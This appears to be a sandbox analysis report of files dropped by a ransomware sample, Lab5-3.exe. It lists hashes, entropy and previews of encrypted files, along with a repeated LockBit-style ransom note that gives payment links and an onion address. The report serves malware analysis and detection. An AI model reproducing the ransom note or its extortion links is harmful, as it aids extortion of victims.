                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):52880
                                                                                                          Entropy (8bit):7.996829007801983
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:1zWKUOET8PRNnF8473VjFSccBMiVdX1t7J3YJ7WBooXQwYn/vvKsZtPhBtwUNuKd:pWKjETaVF8U3VjFeBflt7JMSevfbe8Z
                                                                                                          MD5:119119D5D0DE5CBC826A2A86F201D4A4
                                                                                                          SHA1:E6584BE7732267E3E948EBB14F26332C7CE7D450
                                                                                                          SHA-256:0EEB296B7B2A438D8F885315466A15262604AD8095AF410BB07B3E43768C163E
                                                                                                          SHA-512:E3CE80F37876822A04CAC19AAF60F0495EDC74343856C2D76ACAC933F4C34DF7DB6C2612F1E9D794F9EFF0C7F83AF5ED16E7844D4C7EEC2A2979354BBEEBED59
                                                                                                          Malicious:true
                                                                                                          Preview:F......f.Y.H.U.M..<...Kk.....go..4h..n\....R.U..4..P.F../.T...ET. ..l'T.`...54.!J..+.fy..."{JG.t6.....7.)o^...L?...(.]>>.p.6...%9...R......"_sg..1vxC...d(...ZA.H..u\#..7..x|B...f.k....I...Y...DZ'..L......xwi*O......B.W.T,T...<.SA".d.=.!.lO..O-"v..qiC.. ..:.....#.;.p.W.........7..+~\.].2...uu0.k..nl......3.u.=M,..R(.vt&.X..b~n.M..z..D...>U.._......z...K..z.5.-&y.4...D...e.......5e.T...G....xJ......p.=.....K....d4qTV.......2...uS......3}1\...s.].O.5.T..Fc..t......Pg.L....LGnA....O.....C.H...q.'.z.......'..&y...j.[X.l...L......m.......E}.WN..uE..?[....XU...2.t4....6F.....).je.oH.&S.TD.q.....ch.4g.\..'..7..'..9$?....q$.4#z.j..s.....@[.W.....|.+.:.....K..5.b.U..u\pZ-.i8-.JN.!.bh.'./3.G"..u......tV...8...\.N.'(.,.#./#.$.<0.&...&..."..8:M....<.u$(..f...7d....v.[...2R....;.."2..Q..E..../][..6..,...c.>E..=..Y.).mS%y.".....Oyu.>.?.v.....e.....}......~...Ar..0.MCw..1.D.|.^C..F.k!d...5tK^..5...jh.6.....SX..^.4...1.+Sh..............oP9..9.@
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):58608
                                                                                                          Entropy (8bit):7.99722453771883
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:2nJDxrRoRXCZP1qmZImO0jvTA5lG8qLJHasTiZ:qrr+RXChbfOCknGpNHas+Z
                                                                                                          MD5:C05762256477184394432E2F75E24CF6
                                                                                                          SHA1:B5A64F925C8B9C5F4ABCEF2A2A6043F5A0D3EF00
                                                                                                          SHA-256:A632727B062F75425689743FFC2E22FF7EE8F9AED3987433EA06E1366F266A76
                                                                                                          SHA-512:5152A6A8A9636E034F44D08E52C214B23749D874BB2DBD5E6F03BD27FC2D6CC97E7777E3C1B1652DB7E205C2284BE23553E8E286A934F1A2E26D82AF8B5BC368
                                                                                                          Malicious:true
                                                                                                          Preview:....j..3...=.../..*{....g..&9R.C..3.....k*.R......b.l...j.........|0..!O.V.eg.v....]x..........S..._..r<l.....!...}5%..J&...%L.....y..9*l......T.l"..t...+#.<.Lsl.!...,G&"....v@..$I..#....'......J..j.,..K.6.AEsR.X.,G..B.^Z.....[eh......[.s..,8!.Q..v.....%^..:.....L.%.s......J.......\:..t:.R.......$pNL...9..../.....X..........q......s.qiW(i...v..B..tCCh(...e....=....o...,3H..)t.d9...U./..........m.$PlZu..l.G.T.|1.i.L.m6M.1.^..>..4..:..k. .h.."..`.M.~H......[/s....!..5C.1.F...'....;.6..}<YL.?.9(....Cy....r...#.E.7;<....J..5. .I3s....Z[].d.s..g.5s...)V....WA.;..A...o.19..bAu.]...S2..i..m..>>..L7dcbdK...8y.....4.T.V......#.S......i._....i...B|._=Qn./.V,%.0.._.*...-...5..D.0..l..J..K.&!).>;.$..@.-}...7..B..oF...).....z_...........|...'.........TG...R0.w.M.*.!.0.)..g..k}r..FdI..m3....2.I..go^..*^.G=.Q....p.=\Z...>Ok.$......?u.i.&l...U5......k._@...Hu..<........tS.e}..%.=.Du{..X.._.Yz...].....1..L...iy-.H-...Ze#..)pO.;.`....rb.NL0...i...t.S.."
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):43520
                                                                                                          Entropy (8bit):7.995693978213717
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:WwcbF/nf9rSuV/O0B1sWnAKPlkSrLYdZvik+grp9m2cTU7CgeN21tkFO30ReqZ:WwcbF/nf9rPV/f1FAKPlkSfSvOg9EHJd
                                                                                                          MD5:E42AE2563BB0BA693BF46D5362296C6B
                                                                                                          SHA1:9F27A51CACB4184F286C6B53DD709FA4394C04C7
                                                                                                          SHA-256:62F0CC35CE62BE085EA7EC5AAC6B2BD72D60780606491E6FD2CF033201971417
                                                                                                          SHA-512:6C269A32BF4EE55C20DA06D365E79E6B5930EDDEECA78C86A87794A80C52385E523C05D36F93A08A35F452CE307A4BF70B96B5E7D2E7E5C7CA996D57FFFF1212
                                                                                                          Malicious:true
                                                                                                          Preview:......h..K5.=m.f_...Z..O..).rCf.qF....N...6z...t.6.+.C.>Q....%l....e.C...... .|ikr:...U...=zb.s.."........U_;..P=M..;w.m..u....1-..>H.....V.`A.....Cy.:]..Q./.-...."p!..(.\....Zx..g...Y-..y..c...Z.G.'.)$fz.....Q.q:D}.>......#Y..T5.r...T.l.D/..$.5..V...O..W.....O...X._.XQ.8A0V..9..-).)Ij.N....lI)..a^e.@....=[^..:.`.q.8...-g.B...... '.T.7i....:.......q..}...&...A.N...0.a..4hx..a.....|...K.........H.YM..:.Urf.m.%u.N....)j..@6.X+P79.C./..6u.Jv...U.4B....+...O.e..4.8.$.[7...-5=...1q...(...HB.!_.VWZ........l.a.)x9[..K...B..C\.. .x. ......Y....a...#....I'.j..o..|..f'X.5ks^.....X....e)E..]....f.k.]....i.....m.$n..?.U..wZ.3"..ML.0..`......,.d...{wKh.]5il...Va...Or.yea.;.....r......./..-....Q..5..]...?`}.)#......u....F&9.|%*p6x..$.^.+...:..B..Q.j2A!].V.......q."(Pq#...)..d...`01-.v.F4}o...Ku........,...[K.E.\./."Q.k...{.)/....#..z........d...8.v..-....UG..e...n.<.+^.._...J....A4.aoM...]..'.k.Z]...f@.....j>Ta.q..3u*.ABs..rg......O.`.U...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):55792
                                                                                                          Entropy (8bit):7.996087404970095
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:ocqDSCkleLlUtdbXFngJgJW/CWjnN+zhH51hdksoQ7rtTpFK8slqs4YAoUlx5t1v:oWO+tdbXJFJW/7jnIzhHHEHQlpYlCiIZ
                                                                                                          MD5:665F52C5D081235A263045903B0FE9F7
                                                                                                          SHA1:590AD0A17E566E1234B62B92C2D7A6148A82CBDA
                                                                                                          SHA-256:50FEFA0C8EEBA4F9F8AAC9CB7D3D70FC5C9018DACA5D1C250C04D3269E24F290
                                                                                                          SHA-512:912B0D5C054C02B5ACF4BD702EB4A3734BDC83C56BFB46A63A0C0F47AA09E243A016A709B69098C613CDF85B0564FF8160DB36014E5270200A8BC8180F853555
                                                                                                          Malicious:true
                                                                                                          Preview:..!.7...].K.h.r..C.Mw9V?.Q.\....8.[...:]?.0-.~.w.f....[4{...E..s..4R..?..@.-..n...j.L.{!.......;9Ug8.....s.5..Iy...8..W........Y../+6....s.....O..OU....n.&JQw\+...}..n.3..f........_..3w.]..U..T.S....v..40.@.jr..d..........q.*M.z!..f....!.w.W..y.L.......-......@y..&.!....z....U.....\.<{..)....y..V.z.M(.w.7..Dt..=..|..}.Y...........N.N..,.......V...W.....M...&Ca..d.6'..g.+u..8....I....c.g{.6....y...W.eJX"W..~.:/..&....,...`XqW..T.i..1........+(,k.!WRX...0....l../.........D... .w....om-.&]N66!.$I<..9...o`K.HX....N..Zw..*.F.e*..7.|.E...`.<|.t....xs.-.]..NA.&#t.-..)3C\.^^9.9.G.-..p.g..S.'2/.k...s...p.b`.i......q..'a"3.R....n~..X7.2Z.H~.>...X..J.{.!..2.W...F...G.....I.S.H..R..9..0.o...c,..w..6J....*.Q..b..T.....p....2."..YTD.\.......S.`.L.Xq.(....|..|............./s..........BQ.b......~U..3.g. ......XV.O...y.^.O^.8.A..Op.vr....N..>...&...zC...\O..M.........u......4[..?2..3..k..eRB....\...-4oJ.:*}..%{...a...x.J.g+..-....g........o.}.3.Q~.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):53872
                                                                                                          Entropy (8bit):7.996543111408103
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:lY6wDq7AfLmrCfxSY+tOsUXdQkQn2ExKrnd1iNjZ:lY6f7imasMQnLxwd1iNjZ
                                                                                                          MD5:3D56568651EB8998CA15D7B726FA811C
                                                                                                          SHA1:9B040827051E8671926B19264A706A0AE09A4747
                                                                                                          SHA-256:CD49DE82149CD106573D0CE1D12D9EA7841350D245C937CA0AE2DCB83B20158A
                                                                                                          SHA-512:91391DF3DBFB5B75AD079E4F9AF4E9FA995D4EF3E97FE684A42873AE3A105611783CC13A036D618BA8C60D9C8D3835003E4654921DF43F6A2B599F4194345FC4
                                                                                                          Malicious:true
                                                                                                          Preview:._._..p......F..F1....5..Z_T`..9x.....e.dQ......Hq..@.*.A.._...]a.9...G.e1...}GH .0O['....S.........!...\)2}.Q..@GD|f.?.k7..b..3..\Cv.F...._..~.....2........Q!'rE)....V...F..P......l<?+l.P.bx.m.'YV.c.K.@.R....&;E4........Jg..!...U..lY...t......*q\9.2Q....PO+d..H&O|....3p).{D.$..x'..n..f.n..$..1..y..~.F....<.......3.E8....q.B..?.=.'.&...%.\....Ns.m.5...VH..Pq.*r...4..<...)4.:2..KZ...u......Lz{b..S.J.^.?.!.`..o..~...@....s..IE(.*.s&...$...A...=...9.f!.chNf>J.2..*(.......&^.dU...%...BuQ6.c..o.o.=.9.../"s..Af..9....zw....^.>.....Z.y..-.0HHi.I.....N.!Y/..r..J........R\..ed....)....}...l.PQd..A..xB...4FB0............A...jbi...2.t.....Ri....;.\.P../..,..b..A..f..T>.{..?D!.Y..-DU.F0q!Hljm.....N..r_=S8.H..X...P.7..B..!..1W..n[.N.......e#.o.a.A.q....-..O@.D..0.)*.@..........-.K..X.z...`&.,..2k.D.[..F..:..K=f...D..4/.....~.;..SU..t..&..n.T..W&..F.E7..ftw...*..gCv...5.]..C...........oQ.....%.s0k..5..6/....T/....../...y.\]...M0j.PT...s.Z..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):57632
                                                                                                          Entropy (8bit):7.99703491655389
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:pQG2Us8M6Pzokh4UPUokLCt9Qe7sj1L33tB3S8I/Z:f2wokhJGLYQe0xHtg7Z
                                                                                                          MD5:1E79B23899D5565ACCD24A39506606CF
                                                                                                          SHA1:8ADDB7D157FF99A407118F82F057D1972E98D35F
                                                                                                          SHA-256:1FE83789FBAEA092F0C3F46264C06E306C04A0496A0E5DD2255C1FC1456D7536
                                                                                                          SHA-512:2AF2A97F7F4D27037BFCCF2D2CD47822734552AF724C2DC7AC369B8082547ACBE76FAB4C01AA95EB35B8D308AAFCE415855EC94E811FC650D2B52DBC5613CF70
                                                                                                          Malicious:true
                                                                                                          Preview:..)......H.W...<y.......'$YK5.L9.......Sg..6.['h.kX.x.k...gH.v)"..Vn?l....0.li...,...E..`...'.4.w..>b....F....t.9..}.Xjn..;d^..~..WZ.DX.....XU{..u....$))...s...u.....z..N..1Wa..Lt...4...01.H.>q...Y.....z.{Z..?.C..T..o..&..J.z.v.Lb...-...y..4.%@.'.}....R.. .*...'.U>...q...#.%K....h~..]...V...S.ex..a....`....hw...,v.....z.H.6.g..B:0.Ad ...\\N..F..m...O?.F......4p..C.X..'uGv..?~:?.`t.c..~.$.|..TU3........o.:!!....4u.r-V..9..b. +......K.($rh..kT.......J...0..?..........%.../*-..2....h.2..T.y.8...........6.]b..v...T.dp..4.b;....AJ.3/.......^..Tg.c...i.YY..n...>..+u.;"..Q.......U..J....C..6.."..G...D.F..V..hc.PC...<\....`../Z.0..H)1...<W...5.....a.i...F.l..4)...;.#..H.=.&N..^V.vV...ftk..L.b..F.i..7....F=...A.|g5...&m&N.%....K._{..=?....AZV..u,...ayf...&..w....=.5gZl..$.yL.z...p..'......Yeq.q.T.v.'.Y\z@)._V<.....N.Q.p..X4.. ..$k....YdC...j.)qT=1y..o.v.,~.8..3rSM..T.....T.WV.y7...x.l.....,I...........0.s....\./..s.......k.......7L..0vN.h]<~,j..!
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):54672
                                                                                                          Entropy (8bit):7.996977585533891
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:gFy8+QjZktNES/G1EuER81QtkYomOf8RaLykZ:gy8lcWtRnpmOkRaLdZ
                                                                                                          MD5:29843B32CD49E21CFE945E63BD666D91
                                                                                                          SHA1:4C18055F12D9D7BF5AFF84BD23C8A647F4A8ACF9
                                                                                                          SHA-256:19B4F8911601D0D507F4A93D18A128C2326F9C514F6E2CEC4AAAF90280C72601
                                                                                                          SHA-512:C98856966EF755382B0A8AE6F532F74C6C2AB3CDD22D40BB985013616BD5D1A4D8F083F1B433B1FF826FC5B019EEE13ABAFF7A336DC798B0F58BB42CFB94373E
                                                                                                          Malicious:true
                                                                                                          Preview:..'.m.L...7Y.Om.....d1..,.......Oi...%.O.c.......A&.......+.&..J.B.~nY..].&..|...5.WA...7..3O?.3..;.b...."..}.s..}.N.7.k..kV.gb.d.1..C.....?{..@..\.X......M...5Z......n...'..Kb..[.:|g....=.e..c.Q.:.F... |......x..z........j]9....!...x....Ol....>...KQ...........o...h.g.c....|....+.....3..\?\.3H.7o..Qq..Sd*O...63...1"....7..Y.+..}..i..k]...r.$<....{.Y.......-.....z.?....>&j.y......(...7H.j,s.M..M..NB...^..|.u.a.....G~wy.>.h%.q.*....6...X...Z...yc$.[(F~...=.......j~wi.o........r...s..!.......gM....J..Y...g..kwr...D...O7~.E.........U.s(./..^.vP...G.}.|..T'T%...[.#L7;..I.....}3/BG..d......D..Q.......`3..`................P)D...9...#{....D._.L@..^'Y.ay.Y._.81.D...j1d.,#.u...p)>..iw..>._.h...eq.....f}.u#....../......yZU.{..'..p...].h..Z'..Ku..}=.]...~.]..&..\..>........J..p..U>/].,.{..s...I.R..$....q...\..O.<..}....F.R><..=:.z.>......G.....PbQ .q.c\4........Fg.-".HAkt*^....c.!.3 j...e..x.D.._..<.S..].I..BMy............(%..!{...^....O..P.:D..^F...n.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):63168
                                                                                                          Entropy (8bit):7.997046261686376
                                                                                                          Encrypted:true
